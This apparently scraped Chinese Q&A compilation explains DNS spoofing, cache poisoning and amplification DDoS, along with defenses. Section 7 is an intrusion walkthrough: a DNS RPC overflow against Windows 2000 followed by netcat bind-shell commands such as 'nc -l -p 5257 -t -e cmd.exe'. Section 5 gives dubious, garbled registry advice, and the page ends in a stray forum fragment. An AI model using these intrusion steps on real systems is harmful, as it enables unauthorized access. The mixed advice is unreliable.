1、DNS攻擊事件是什麼?
定義: DNS欺騙就是攻擊者冒充域名伺服器的一種欺騙行為。
原理:如果可以冒充域名服務版器,然後把查權詢的IP地址設為攻擊者的IP地址,這樣的話,用戶上網就只能看到攻擊者的主頁,而不是用戶想要取得的網站的主頁了,這就是DNS欺騙的基本原理。DNS欺騙其實並不是真的「黑掉」了對方的網站,而是冒名頂替、招搖撞騙罷了。
現在的Internet上存在的DNS伺服器有絕大多數都是用bind來架設的,使用的bind版本主要為bind 4.9.5+P1以前版本和bind 8.2.2-P5以前版本.這些bind有個共同的特點,就是BIND會緩存(Cache)所有已經查詢過的結果,這個問題就引起了下面的幾個問題的存在.
1>.DNS欺騙
在DNS的緩存還沒有過期之前,如果在DNS的緩存中已經存在的記錄,一旦有客戶查詢,DNS伺服器將會直接返回緩存中的記錄.
2、幾種針對DNS的DDoS攻擊應對方法
DDoS攻擊是指通過僵屍網路利用各種服務請求耗盡被攻擊網路的系統資源,造成被攻擊網路無法處理合法用戶的請求。而針對DNS的DDoS攻擊又可按攻擊發起者和攻擊特徵進行分類:
1、按攻擊發起者分類 僵屍網路:控制大批僵屍網路利用真實DNS協議棧發起大量域名查詢請求 模擬工具:利用工具軟體偽造源IP發送海量DNS查詢
2、按攻擊特徵分類 Flood攻擊:發送海量DNS查詢報文導致網路帶寬耗盡而無法傳送正常DNS 查詢請求。
資源消耗攻擊:發送大量非法域名查詢報文引起DNS伺服器持續進行迭代查詢,從而達到較少的攻擊流量消耗大量伺服器資源的目的。
處理辦法:
屏蔽未經請求發送的DNS響應信息
一個典型的DNS交換信息是由請求信息組成的。DNS解析器會將用戶的請求信息發送至DNS伺服器中,在DNS伺服器對查詢請求進行處理之後,伺服器會將響應信息返回給DNS解析器。但值得注意的是,響應信息是不會主動發送的。
伺服器在沒有接收到查詢請求之前,就已經生成了對應的響應信息,回應就被丟棄
丟棄快速重傳數據包。
1.即便是在數據包丟失的情況下,任何合法的DNS客戶端都不會在較短的時間間隔內向同一DNS伺服器發送相同的DNS查詢請求。
2.如果從相同IP地址發送至同一目標地址的相同查詢請求發送頻率過高,這些請求數據包可丟棄。
啟用TTL
如果DNS伺服器已經將響應信息成功發送了,應該禁止伺服器在較短的時間間隔內對相同的查詢請求信息進行響應。
1.對於一個合法的DNS客戶端如果已經接收到了響應信息,就不會再次發送相同的查詢請求。
2.每一個響應信息都應進行緩存處理直到TTL過期。
3.當DNS伺服器遭遇大量查詢請求時,可以屏蔽掉不需要的數據包。
丟棄未知來源的DNS查詢請求和響應數據
通常情況下,攻擊者會利用腳本來對目標進行分布式拒絕服務攻擊(DDoS攻擊),而且這些腳本通常是有漏洞的。因此,在伺服器中部署簡單的匿名檢測機制,在某種程度上可以限制傳入伺服器的數據包數量。
丟棄未經請求或突發的DNS請求
這類請求信息很可能是由偽造的代理伺服器所發送的,或是由於客戶端配置錯誤或者是攻擊流量。所以無論是哪一種情況,都應該直接丟棄這類數據包。
非泛洪攻擊 (non-flood) 時段,創建一個白名單,添加允許伺服器處理的合法請求信息。白名單可以屏蔽掉非法的查詢請求信息以及此前從未見過的數據包。
這種方法能夠有效地保護伺服器不受泛洪攻擊的威脅,也能保證合法的域名伺服器只對合法的DNS查詢請求進行處理和響應。
啟動DNS客戶端驗證
偽造是DNS攻擊中常用的一種技術。如果設備可以啟動客戶端驗證信任狀,便可以用於從偽造泛洪數據中篩選出非泛洪數據包。
對響應信息進行緩存處理
如果某一查詢請求對應的響應信息已經存在於伺服器的DNS緩存之中,緩存可以直接對請求進行處理。這樣可以有效地防止伺服器因過載而發生宕機。
很多請求中包含了伺服器不具有或不支持的信息,我們可以進行簡單的阻斷設置,例如外部IP地址請求區域轉換或碎片化數據包,直接將這類請求數據包丟棄。
利用ACL,BCP38,及IP信譽功能的使用
託管DNS伺服器的任何企業都有用戶軌跡的限制,當攻擊數據包被偽造,偽造請求來自世界各地的源地址。設置一個簡單的過濾器可阻斷不需要的地理位置的IP地址請求或只允許在地理位置白名單內的IP請求。
還有一種情況,某些偽造的數據包可能來自與內部網路地址,可以利用BCP38通過硬體過濾也可以清除異常來源地址的請求。
BCP38對於提供DNS解析的服務提供商也相當有用,可以避免用戶向外發送攻擊或受到內部地址請求的攻擊,過濾用戶並保證其數據傳輸。
提供餘量帶寬
如果伺服器日常需要處理的DNS通信量達到了X Gbps,請確保流量通道不止是日常的量,有一定的帶寬餘量可以有利於處理大規模攻擊。
結語,目前針對DNS的攻擊已成為最嚴重的網路威脅之一。目前越來越多的大型網站注重DNS保護這一塊。為保障網站安全,保障網站利益,選擇高防型的DNS為自己的域名進行解析已經迫在眉睫。
希望可以幫到您,謝謝!
3、如何有效防範DNS放大攻擊
這種攻擊是一種數據包的大量變體能夠產生針對一個目標的大量的虛假的通訊。這種虛假通訊的數量有多大?每秒鍾達數GB,足以阻止任何人進入互聯網。
與老式的「smurf attacks」攻擊非常相似,DNS放大攻擊使用針對無辜的第三方的欺騙性的數據包來放大通訊量,其目的是耗盡受害者的全部帶寬。但是,「smurf attacks」攻擊是向一個網路廣播地址發送數據包以達到放大通訊的目的。DNS放大攻擊不包括廣播地址。相反,這種攻擊向互聯網上的一系列無辜的第三方DNS伺服器發送小的和欺騙性的詢問信息。這些DNS伺服器隨後將向表面上是提出查詢的那台伺服器發回大量的回復,導致通訊量的放大並且最終把攻擊目標淹沒。因為DNS是以無狀態的UDP數據包為基礎的,採取這種欺騙方式是司空見慣的。
當前許多DNS伺服器支持EDNS。EDNS是DNS的一套擴大機制,RFC 2671對次有介紹。一些選擇能夠讓DNS回復超過512位元組並且仍然使用UDP,如果要求者指出它能夠處理這樣大的DNS查詢的話。攻擊者已經利用這種方法產生了大量的通訊。通過發送一個60個位元組的查詢來獲取一個大約4000個位元組的記錄,攻擊者能夠把通訊量放大66倍。一些這種性質的攻擊已經產生了每秒鍾許多GB的通訊量,對於某些目標的攻擊甚至超過了每秒鍾10GB的通訊量。
要實現這種攻擊,攻擊者首先要找到幾台代表互聯網上的某個人實施循環查詢工作的第三方DNS伺服器(大多數DNS伺服器都有這種設置)。由於支持循環查詢,攻擊者可以向一台DNS伺服器發送一個查詢,這台DNS伺服器隨後把這個查詢(以循環的方式)發送給攻擊者選擇的一台DNS伺服器。接下來,攻擊者向這些伺服器發送一個DNS記錄查詢,這個記錄是攻擊者在自己的DNS伺服器上控制的。由於這些伺服器被設置為循環查詢,這些第三方伺服器就向攻擊者發回這些請求。攻擊者在DNS伺服器上存儲了一個4000個位元組的文本用於進行這種DNS放大攻擊。
現在,由於攻擊者已經向第三方DNS伺服器的緩存中加入了大量的記錄,攻擊者接下來向這些伺服器發送DNS查詢信息(帶有啟用大量回復的EDNS選項),並採取欺騙手段讓那些DNS伺服器認為這個查詢信息是從攻擊者希望攻擊的那個IP地址發出來的。這些第三方DNS伺服器於是就用這個4000個位元組的文本記錄進行回復,用大量的UDP數據包淹沒受害者。攻擊者向第三方DNS伺服器發出數百萬小的和欺騙性的查詢信息,這些DNS伺服器將用大量的DNS回復數據包淹沒那個受害者。
如何防禦這種大規模攻擊呢?首先,保證你擁有足夠的帶寬承受小規模的洪水般的攻擊。一個單一的T1線路對於重要的互聯網連接是不夠的,因為任何惡意的腳本少年都可以消耗掉你的帶寬。如果你的連接不是執行重要任務的,一條T1線路就夠了。否則,你就需要更多的帶寬以便承受小規模的洪水般的攻擊。不過,幾乎任何人都無法承受每秒鍾數GB的DNS放大攻擊。
因此,你要保證手邊有能夠與你的ISP隨時取得聯系的應急電話號碼。這樣,一旦發生這種攻擊,你可以馬上與ISP聯系,讓他們在上游過濾掉這種攻擊。要識別這種攻擊,你要查看包含DNS回復的大量通訊(源UDP埠53),特別是要查看那些擁有大量DNS記錄的埠。一些ISP已經在其整個網路上部署了感測器以便檢測各種類型的早期大量通訊。這樣,你的ISP很可能在你發現這種攻擊之前就發現和避免了這種攻擊。你要問一下你的ISP是否擁有這個能力。
最後,為了幫助阻止惡意人員使用你的DNS伺服器作為一個實施這種DNS放大攻擊的代理,你要保證你的可以從外部訪問的DNS伺服器僅為你自己的網路執行循環查詢,不為任何互聯網上的地址進行這種查詢。大多數主要DNS伺服器擁有限制循環查詢的能力,因此,它們僅接受某些網路的查詢,比如你自己的網路。
4、DNS欺騙攻擊和防範方法有哪些
一 什麼是DNS
DNS 是域名系統 (Domain Name System) 的縮寫,該系統用於命名組織到域層次結構中的計算機和網路服務。在Internet上域名與IP地址之間是一一對應的,域名雖然便於人們記憶,但機器之間只能互相認識IP地址,它們之間的轉換工作稱為域名解析,域名解析需要由專門的域名解析伺服器來完成,DNS就是進行域名解析的伺服器。
二 DNS的工作原理
DNS 命名用於 Internet 等 TCP/IP 網路中,通過用戶友好的名稱查找計算機和服務。當用戶在應用程序中輸入 DNS 名稱時,DNS 服務可以將此名稱解析為與之相關的其他信息,如 IP 地址。因為,你在上網時輸入的網址,是通過域名解析系解析找到相對應的IP地址,這樣才能上網。其實,域名的最終指向是IP。
在IPV4中IP是由32位二進制數組成的,將這32位二進制數分成4組每組8個二進制數,將這8個二進制數轉化成十進制數,就是我們看到的IP地址,其范圍是在0~255之間。因為,8個二進制數轉化為十進制數的最大范圍就是0~255。現在已開始試運行、將來必將代替IPV6中,將以128位二進制數表示一個IP地址。
大家都知道,當我們在上網的時候,通常輸入的是如:www.sina.com.cn 這樣子的網址,其實這就是一個域名,而我們計算機網路上的計算機彼此之間只能用IP地址才能相互識別。再如,我們去一WEB伺服器中請求一WEB頁面,我們可以在瀏覽器中輸入網址或者是相應的IP地址,例如我們要上新浪網,我們可以在IE的地址欄中輸入:www.sina.com.cn 也可輸入這樣子 218.30.66.101 的IP地址,但是這樣子的IP地址我們記不住或說是很難記住,所以有了域名的說法,這樣的域名會讓我們容易的記住。
DNS:Domain Name System 域名管理系統 域名是由圓點分開一串單詞或縮寫組成的,每一個域名都對應一個惟一的IP地址,這一命名的方法或這樣管理域名的系統叫做域名管理系統。
DNS:Domain Name Server 域名伺服器 域名雖然便於人們記憶,但網路中的計算機之間只能互相認識IP地址,它們之間的轉換工作稱為域名解析(如上面的www.sina.com.cn 與 218.30.66.101 之間的轉換),域名解析需要由專門的域名解析伺服器來完成,DNS就是進行域名解析的伺服器。
三 DNS欺騙攻擊
DNS欺騙即域名信息欺騙是最常見的DNS安全問題。當一個DNS伺服器掉入陷阱,使用了來自一個惡意DNS伺服器的錯誤信息,那麼該DNS伺服器就被欺騙了。DNS欺騙會使那些易受攻擊的DNS伺服器產生許多安全問題,例如:將用戶引導到錯誤的互聯網站點,或者發送一個電子郵件到一個未經授權的郵件伺服器。網路攻擊者通常通過以下幾種方法進行DNS欺騙。
1、緩存感染:
黑客會熟練的使用DNS請求,將數據放入一個沒有設防的DNS伺服器的緩存當中。這些緩存信息會在客戶進行DNS訪問時返回給客戶,從而將客戶引導到入侵者所設置的運行木馬的Web伺服器或郵件伺服器上,然後黑客從這些伺服器上獲取用戶信息。
2、DNS信息劫持:
入侵者通過監聽客戶端和DNS伺服器的對話,通過猜測伺服器響應給客戶端的DNS查詢ID。每個DNS報文包括一個相關聯的16位ID號,DNS伺服器根據這個ID號獲取請求源位置。黑客在DNS伺服器之前將虛假的響應交給用戶,從而欺騙客戶端去訪問惡意的網站。
3、DNS重定向
攻擊者能夠將DNS名稱查詢重定向到惡意DNS伺服器。這樣攻擊者可以獲得DNS伺服器的寫許可權。
四 DNS的防範方法
防範方法其實很簡單,總結來說就只有兩條。(1) 直接用IP訪問重要的服務,這樣至少可以避開DNS欺騙攻擊。但這需要你記住要訪問的IP地址。(2) 加密所有對外的數據流,對伺服器來說就是盡量使用SSH之類的有加密支持的協議,對一般用戶應該用PGP之類的軟體加密所有發到網路上的數據。只要能做到這些,基本上就可以避免DNS欺騙攻擊了。
現在知道為什麼當你在瀏覽器中輸入正確的URL地址,但是打開的並不是你想要去的網站了吧,這就是神奇的DNS欺騙,希望學習DNS協議欺騙攻擊技術有所幫助
5、怎麼樣防止DNS伺服器被攻擊3大方法
用戶在防火牆日誌中發現大量的DNS緩存攻擊記錄這是電信搞鬼,強制性推廣廣告以扭轉盈利下滑的局面,所以被檢測為DNS緩存投毒在DOS下鍵入ipconfig/flushdns命令清除DNS緩存惡意程序修改你電腦上DNS緩存中的內容,一是讓你不能正常上網,比如把.cn的IP地址修改為127.0.0.1,這樣無論如何也不能找到新浪網了,二是將某些惡意IP地址放進DNS緩存,比如把.cn對應的IP地址修改為惡意網站地址,當你在地址欄輸入.cn的時候,訪問的卻是惡意網站。由於操作系統在進行DNS解析的時候首先查詢DNS緩存,如果在緩存中能查到,就不會再找DNS伺服器了。這樣一旦dns緩存被修改,你去修改DNS伺服器之類的網路參數也是無效的。用IPCONFIG/displaydns命令欄查看當前dns緩存里的內容。用ipconfig/flushdns命令刷新dns緩存中的內容。若要防止dns緩存攻擊,應禁用dns緩存,方法:禁用客戶端DNS緩存1.啟動注冊表編輯器(Regedit)。2.在注冊表項中HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters3.第一行(默認)。鍵入1,然後單擊確定。4.退出注冊表編輯器。
6、DNS攻擊是指什麼
DNS是域名解析系統,因為網路上所有主機都以IPv4來進行標記和識別,就是是通常所說的IP地址(例如192.168.1.1)
然而咱們一般上網訪問網頁用的都是域名(例如baidu.com),這個域名並不能直接讓咱么找到百度的伺服器,所以要通過DNS將域名轉換為IP地址,所以咱們一般上網的過程是這樣的:
輸入域名,電腦將域名發送給DNS,DNS返回給電腦IP地址,電腦用IP地址在網際網路上找伺服器
那麼如果DNS返回的IP並不是你想訪問的域名的真正IP呢?
這就是所謂的DNS攻擊了
一般有兩種方式:1.篡改電腦默認DNS的IP地址,將其指向一個已預設為惡意DNS伺服器的地址,對用戶進行欺騙,這樣做比較簡單,但是只能攻擊一台電腦,而且機主在發現後還可以將DNS的IP改回去
2.直接攻擊國家主幹DNS伺服器,或導致起癱瘓,一類攻擊者會把全部域名指向一個錯誤的IP使用戶無法訪問網頁(但是仍可以直接通過IP地址來訪問頁面),另一類攻擊者會把DNS中的部分域名對應的IP地址篡改為已預設的欺詐伺服器IP地址,來套取用戶在該真實網站的賬戶,密碼,銀行卡,驗證碼等,來套取錢財。舉個例子,某入侵者將支付寶域名所對應的IP改為他自己預設的欺詐伺服器的IP,然而這個欺詐伺服器的頁面和支付寶的真正頁面一模一樣,用戶無法分辨,當用戶在上面輸入支付寶的賬戶密碼時,這些信息也別欺詐伺服器的設置者(DNS攻擊者)所獲取。這樣做可以是某市,某省,甚至某個地區的DNS用戶收到影響,而且欺詐行為不易被用戶發覺,但是攻擊起來卻相當麻煩,可不要小看主幹DNS的防火牆
7、如何利用dns漏洞入侵
前提是必須要開放53、445埠 1、選擇superscan進行掃描,在埠列表中勾選上53、445埠,然後選擇主機段進行掃描。
2、選擇存在53、445埠的主機,在cmd下輸入dns -t ip對主機進行特定漏洞埠掃描,「1028 :Vulnerability」表示
1028埠存在溢出漏洞,「os:window 2000」表示系統類型為window 2000。
3、在執行dns -t 2000all ip 1028 對目標主機進行溢出。connection to target host tcp port established 成功連接到主機的tcp埠上,
successfully bound to the vulnerale dcerpc interface 已經連接到對方的rpc埠上,os fingerprint result:windows 2000
系統指紋鑒定對方是wind2000系統,attack sent,check port 1100 攻擊代碼已經成功發送,並嘗試連接1100埠。當出現最後這一句
提示語句的時候就意味著我們要成功了。
4、怎麼連接對方的1100埠呢,當然我們要使用nc了。
5、nc全稱叫"netcat",這是一個非常簡單易用的基於tcp/ip協議(c/s模型的)的「瑞士軍刀」。下面介紹一下它的幾個常用功能
1、nc.exe -vv -l -p 6069,表示在本地6069埠上進行監聽。-vv:顯示詳細的信息。-l:進行監聽,監聽入站信息。-p:監聽所使用的
埠號。
2、正如我們遇到的情況,對方已經開放了一個埠。他在等待我們連接哦,連接上去會有什麼呢?當然是system許可權的shell了。
nc.exe -vv 127.0.0.1 5257,連接ip為127.0.0.1的5257埠。
3、還可以在本地監聽埠的同時綁定shell,就相當於一個telnet服務端。通常這個命令在肉雞上執行,然後當我們連接上去就可以獲得
這個shell了。nc.exe -l -p 5257 -t -e cmd.exe,在本機5257埠上監聽並綁定cmd.exe。-e 作用就是程序定向。-t以telnet的形式
來應答。
4、它可以用來手動對主機提交數據包(通常為80)埠,nc.exe -vv 127.0.0.1 80 <yan.txt,往ip為127.0.0.1的80埠提交yan.txt中
的內容。
6、介紹完nc.exe的四種常用方式,現在知道如何使用nc來鏈接對方的1100埠了吧,我們使用nc -vv 127.0.0.1 1100 連接對方的1100埠,
成功獲得了一個具有system許可權的cmdshell,現在想干什麼就干什麼了。
8、為什麼我的電腦會被DNS伺服器攻擊啊 ?
有可能中病毒,arp病毒在區域網,小區寬頻裡面挺常見的,沒有太好的辦法,你只能用
arp -s "ip地址 比如 192。168.0.1" "機器mac地址 "
來靜態鎖定主機物理地址
以防止arp病毒攻擊
9、dns伺服器攻擊有哪些百度百科
DNS:是做域名解析的。我們平時所輸入的網址,都是某台伺服器的主機名,比如百度,主機之間通訊是通過IP地址訪問的,這個是有需要某個機制,把地址解析成名字,因為IP地址是一串數字,難以記憶,而名字卻很好記,這個就是DNS所要完成的,就好像,身份證上面的號碼是IP,而名字就是主機名一樣。
比如,你要訪問百度從你輸入網址開始,到網頁打開,整個的過程如下:(一切所需的IP地址都是正確的)
1. 你的請求通過你設置的網關地址(網關地址就是路由器內網IP地址)發到公網的DNS伺服器(這個DNS伺服器是在你網卡設置中設置的)。
2. DNS伺服器收到請求之後,查找自己的資料庫,尋找你所輸入的百度這台伺服器的地址是什麼,找到之後,再把找到的IP地址告訴你這個客戶端。
3. 客戶端收到了DNS伺服器的回應,獲得了百度這台主機的IP地址,然後再向這個IP地址發出請求,當然,也是通過網關出去,最終,你將打開百度這個網頁。
這所以出現你的這個提示,應該是你的網卡設置上沒有設置DNS造成的,或者DNS設置失敗。
你最好先電話咨詢一下你們當地的運營商,問問DNS的IP地址是多少,然後再在網卡里設置一下。
在你的主機上,右鍵點擊網上鄰居--屬性,再右鍵點擊他的網卡(一般都是一個叫本地連接的圖標),再選屬性,出現一個窗口,在「此連接使用下列項目」的下面選擇「internet協議(TCP/IP),雙擊這個選項,你會看到一個設置IP地址的對話框。裡面有「使用下列DNS伺服器」,在這里填寫你被告知的DNS地址就可以了
不能隨意填寫,在寬頻的基礎上DNS伺服器地址 可以選自動的 無影響
TCPIP里的DNS伺服器地址是用你寬頻線連接的最近伺服器地址。
如果有打不開網頁等情況發生,就要填自己那個地方的DNS地址,百度上都能搜到。
10、為什麼dns伺服器攻擊我的電腦?
回復
2#
謝謝
但是暫時還不想換牆但是請問
可以不勾選「屏蔽攻擊ip5分鍾」
的那個選項嗎?
不勾選的話
有害處嗎?在windows7下
6.7版
雖然也攔截
但不會斷網在xp下6.5版
偶爾會斷網